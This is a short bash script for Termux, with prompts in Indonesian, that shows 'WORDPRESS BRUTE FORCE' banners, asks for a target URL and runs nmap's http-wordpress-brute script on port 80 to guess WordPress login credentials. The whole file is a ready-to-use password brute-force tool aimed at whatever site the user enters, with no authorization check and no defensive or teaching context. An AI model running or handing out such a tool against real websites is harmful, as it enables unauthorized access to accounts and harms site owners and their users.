#!/data/data/com.termux/files/usr/bin/bash

clear

figlet WORDPRESS
figlet BRUTE FORCE

echo -n "Masukan Url : "
read a
if [ ! -z $a ];
then
nmap -p80 --script http-wordpress-brute -d $a
else
echo "Url Kosong!"
fi
